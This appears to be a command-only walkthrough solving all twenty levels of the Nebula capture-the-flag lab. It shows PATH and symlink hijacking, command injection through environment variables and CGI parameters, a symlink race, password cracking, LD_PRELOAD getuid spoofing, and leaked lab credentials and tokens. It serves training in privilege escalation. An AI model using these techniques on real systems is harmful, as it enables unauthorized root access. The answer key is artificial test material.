Level 00
$ find / -user flag00 -perm -4000 2>/dev/null
$ /bin/.../flag00
$ /bin/getflag
Level 01
$ ln -s /bin/getflag /tmp/echo
$ PATH=/tmp:$PATH
$ /home/flag01/flag01
Level 02
$ USER=';/bin/getflag;#'
$ /home/flag02/flag02
Level 03
$ echo -en '#!/bin/sh\n\n/bin/getflag > /tmp/flag03' > /home/flag03/writable.d/l03.sh
$ cat /tmp/flag03
Level 04
$ ln -s /home/flag04/token /tmp/t0k3n
$ /home/flag04/flag04 /tmp/t0k3n
$ su -l flag04
06508b5e-8909-4f38-b630-fdb148a848a2
$ /bin/getflag
Level 05
$ tar xvzf /home/flag05/.backup/backup-19072011.tgz -C /tmp/.
$ ssh -i /tmp/.ssh/id_rsa flag05@localhost /bin/getflag
Level 06
$ cat /etc/passwd | grep flag06
$ echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > /tmp/flag06.pw
$ john /tmp/flag06.pw
$ su -l flag06
hello
$ /bin/getflag
Level 07
$ nc localhost 7007
GET /index.cgi?Host=localhost|/bin/getflag
Level 08
$ wireshark capture.pcap
# Follow TCP Stream + Hexdump
$ su -l flag08
backd00Rmate
$ /bin/getflag
Level 09
$ echo '[email ${`/bin/echo;/usr/bin/id;/bin/getflag;/bin/echo`}]' > /tmp/l09
$ /home/flag09/flag09 /tmp/l09
Level 10
$ nc -v -k -l localhost 18211
$ for i in `seq 1 1000`; do ln -f -s /etc/hostname /tmp/token; /home/flag10/flag10 /tmp/token localhost & ln -f -s /home/flag10/token /tmp/token; done
$ nc -v -k -l localhost 18211
$ su -l flag10
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
$ /bin/getflag
Level 11
$ PATH=/tmp:$PATH
$ ln -s /bin/getflag /tmp/c
$ cat /tmp/11a.py
$ chmod +x /tmp/11a.py
$ /tmp/11a.py | /home/flag11/flag11
$ TEMP=/tmp
$ cat /tmp/11b.py
$ chmod +x /tmp/11b.py
$ /tmp/11b.py | /home/flag11/flag11
Level 12
$ nc localhost 50001
4754a4f4bd5787accd33de887b9250a0691dd198; /bin/getflag > /tmp/flag12 #
$ cat /tmp/flag12
Level 13
$ cp /home/flag13/flag13 /tmp/.
$ echo 'int getuid() { return 1000; }' > /tmp/libfake.c
$ gcc -shared /tmp/libfake.c -o /tmp/libfake.so
$ LD_PRELOAD=/tmp/libfake.so /tmp/flag13
$ su -l flag13
b705702b-76a8-42b0-8844-3adabbe5ac58
$ /bin/getflag
Level 14
$ /home/flag14/flag14 -e
$ cat /home/flag14/token
$ cat /tmp/l14.py
$ /tmp/l14.py 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
$ su -l flag14
8457c118-887c-4e40-a5a6-33a25353165
$ /bin/getflag
Level 15
$ strace /home/flag15/flag15
$ cat /tmp/libfake.c
$ cat /tmp/version
$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=/tmp/version,-Bstatic -o /var/tmp/flag15/libc.so.6 /tmp/libfake.c
$ /home/flag15/flag15
$ /bin/getflag
Level 16
$ cat /tmp/L16
$ nc localhost 1616
GET /index.cgi?username=`/*/L16`
$ cat /tmp/flag16
Level 17
$ cat /tmp/l17.py
$ python /tmp/l17.py
$ cat /tmp/flag17
Level 18
$ cat /tmp/Starting
$ chmod +x /tmp/Starting
$ PATH=/tmp:$PATH
$ python -c "print 'login me\n'*1021 + 'closelog\n'*1021 + 'shell\n'" | /home/flag18/flag18 --rcfile -d /tmp/debug -v -v -v 2> /dev/null
Level 19
$ cat /tmp/fork.c
$ gcc -o /tmp/fork /tmp/fork.c
$ /tmp/fork
$
$ cat /tmp/fork.py
$ python /tmp/fork.py
$
Reference
https://exploit-exercises.com/nebula/